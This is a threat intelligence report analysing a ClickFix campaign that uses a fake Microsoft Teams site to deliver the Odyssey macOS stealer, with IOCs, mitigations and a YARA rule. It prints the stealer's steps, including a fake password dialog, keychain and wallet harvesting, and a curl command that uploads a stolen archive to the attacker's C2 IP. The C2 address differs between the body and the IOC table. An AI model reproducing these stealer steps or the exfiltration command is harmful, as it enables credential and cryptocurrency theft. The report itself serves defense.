استخبارات الخصم

Threat Actors Impersonate Microsoft Teams To Deliver Odyssey macOS Stealer Via Clickfix

Threat actors are exploiting a fake Microsoft Teams download site to deliver the Odyssey macOS stealer via Clickfix. Once executed, the malware harvests credentials, cookies, Apple Notes, and crypto wallets, exfiltrating data to a C2 server before ensuring persistence through LaunchDaemons and even replacing Ledger Live with a trojanized version. The campaign poses severe risks of credential theft, financial loss, and long-term reinfection.

September 5, 2025

min

Table of Content

Example H2

Executive Summary

In early August 2025, Forcepoint released a report about a clickfix campaign that impersonated Tradingview to deliver Odyssey stealer. During routine infrastructure discovery, CloudSEK’s TRIAD identified that the threat actors are now luring users via a fake Microsoft Teams download site. When victims copy the provided command, a base64-encoded AppleScript stealer (Odyssey) is executed. The malware harvests credentials, browser cookies, Apple Notes, and multiple desktop/extension-based cryptocurrency wallets, staging data into /tmp/out.zip before exfiltrating it to its C2. It then establishes persistence via LaunchDaemons and replaces Ledger Live with a trojanized version.

‍

Analysis

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites targeting macOS users. One of those websites was found to be impersonating Microsoft, with a “Microsoft Teams” logo on the delivery page. Hunting using FOFA, we found 24 unique IPs belonging to the same cluster.

‍

When the victim clicks on “Copy”, a command is copied to the clipboard, depending on the user agent. For windows, it copies the same command shown. For MacOS users, it copies the below:

‍

Clipboard - macOS useragent

The base64 encoded text, decoded below:

‍

Contents of delivery script

1) Execution

One-liner launches a large embedded AppleScript with osascript -e 'run script ...'. No exploit, just script execution. (T1059.002)

2) Discovery

Gathers system inventory with system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType; stores it as “hardware” in a temp working dir /tmp/<random>/. (T1082)

3) Credential Access, Privilege Escalation

Checks if it can auth the local user with dscl . authonly. If not, it prompts the user with a fake dialog: “Required Application Helper. Please enter device password to continue.” It loops until the correct password is entered. (T1056.002, T1110)
Tries to pull the Chrome keychain item via security ... find-generic-password -ga "Chrome" and writes a “masterpass-chrome” file. (T1555.001)
Stashes the captured password at ~/.pwd. (T1555, T1078)

4) Collection

Apple ecosystem

Apple Notes database (NoteStore.sqlite, -wal, -shm) + a fallback that talks to the Notes app to export note bodies into HTML; also vacuums Notes attachments from Notes “Media” folders. (T1119, T1113)
Safari artifacts: Cookies.binarycookies, “Form Values”. (T1555.003, T1539)
Login keychain copy: ~/Library/Keychains/<HardwareUUID> and login.keychain-db. (T1555.001)

Browsers (Chromium family: Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chromium, etc.)

Walks every Default/Profile * profile and copies:
- Cookies, Web Data, Login Data (saved logins & autofill). (T1555.003)
- Local Extension Settings/ and IndexedDB/ for a very long allowlist of extension IDs (wallets, password managers, etc.). (T1005)

Browsers (Gecko family: Firefox, Waterfox)

Copies cookies.sqlite, formhistory.sqlite, key4.db, logins.json from each profile. (T1555.003)
Specifically hunts MetaMask storage by parsing prefs.js to derive the extension’s storage path, then copies its idb buckets. (T1005)

Crypto wallets (desktop apps)

Recursively copies data for Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, plus Ledger Live. (T1555, T1005)
Also grabs Binance/TonKeeper config paths.

Grab-bag

From Desktop/Documents, quietly copies up to ~10 MB of files with “interesting” extensions: txt,pdf,doc,docx,keys,key,wallet,kdbx,jpg,png,jpeg,rtf. (T1005)

5) Exfil Preparation

Mirrors directory trees but skips noisy caches (GPUCache, Code Cache, Crashpad, Cache, etc.). (T1074)
Archives everything to /tmp/out.zip via ditto -c -k. (T1560)

6) Exfiltration, C2

curl -X POST ... --data-binary @/tmp/out.zip http://185.93.89.62/log with headers buildid, username: vipx, repeat: false. Retries on failure. (T1041)
Same host serves secondary payloads at /otherassets/plist and /otherassets/ledger.zip. (T1105)

7) Persistence, Defense Evasion, C2

LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003)
App replacement: kills and replaces Ledger Live.app with a ZIP fetched from the C2, using sudo to remove and unzip into /Applications. (T1036, T1112/T1105)
Cleans up the working dir and /tmp/out.zip after upload. (T1070.004)

‍

This Odyssey sample runs via osascript, steals keychains, cookies, saved logins, Apple Notes, and dozens of wallet/extension stores, zips everything, ships it to http://185.93.89[.]62/log, then plants persistence (LaunchDaemon) and even replaces Ledger Live with a trojanized copy. The C2 is also hosting the Odyssey stealer login panel.

‍

Indicators of Compromise

IOC Indicator Table

Type	Indicator
IP / C2	185.93.89[.]162 (HTTP, /log, /otherassets/plist, /otherassets/ledger.zip)
Delivery Clickfix	teamsonsoft[.]com
Hashes (sha256)	9c520fa25239c0f116ce7818949ddce5fd2f315317863715416cb488 6c5aeb2 7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547a c40d5e1 d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fb a5f9ee8 397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc 1516273 909038524250903a44efd734710e60a8f73719130176c726e58d3287b 22067c8
File Artifacts	~/.pwd, ~/.username, ~/.chost, ~/.botid
Persistence	/Library/LaunchDaemons/com.<random>.plist (random numeric suffix)
Process/Commands	osascript -e run script, dscl . authonly, security ... -ga "Chrome", ditto -c -k, curl -X POST ... --data-binary @/tmp/out.zip, unzip /tmp/ledger.zip
App Tampering	Replacement of /Applications/Ledger Live.app with trojanized version

Impact

Credential Theft: Browser logins, autofill data, keychains, and crypto wallet credentials stolen.
Data Exfiltration: Notes, documents, screenshots, and up to 10MB of personal files exfiltrated.
Financial Theft: Direct compromise of crypto wallets (desktop + extension + Ledger Live tampering).
Persistence & Re-infection: System-level LaunchDaemon ensures long-term access and reinfection risk.

‍

Mitigations

Network Controls: Monitor for unusual curl POSTs with zipped data.
Endpoint Hunting: Audit /Library/LaunchDaemons/ for suspicious com.<digits>.plist and recent osascript executions.
Credential Hygiene: Reset Apple ID, browser, and wallet passwords; reissue keys from uncompromised systems.
Containment & Recovery: Remove trojanized /Applications/Ledger Live.app, wipe temp artifacts, and rebuild infected macOS systems if integrity cannot be guaranteed.

‍

Yara Rule

rule OSX_Odyssey_Osascript_Exec

{

meta:

description = "Detects Odyssey stealer AppleScript execution via osascript"

date = "2025-09-04"

strings:

$osascript = "osascript -e 'run script" ascii

$dscl_auth = "dscl . authonly" ascii

$security_chrome = "security" ascii wide nocase

$masterpass = "masterpass-chrome" ascii

condition:

all of them

}

‍

References

‍

كوشيك بالم

Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.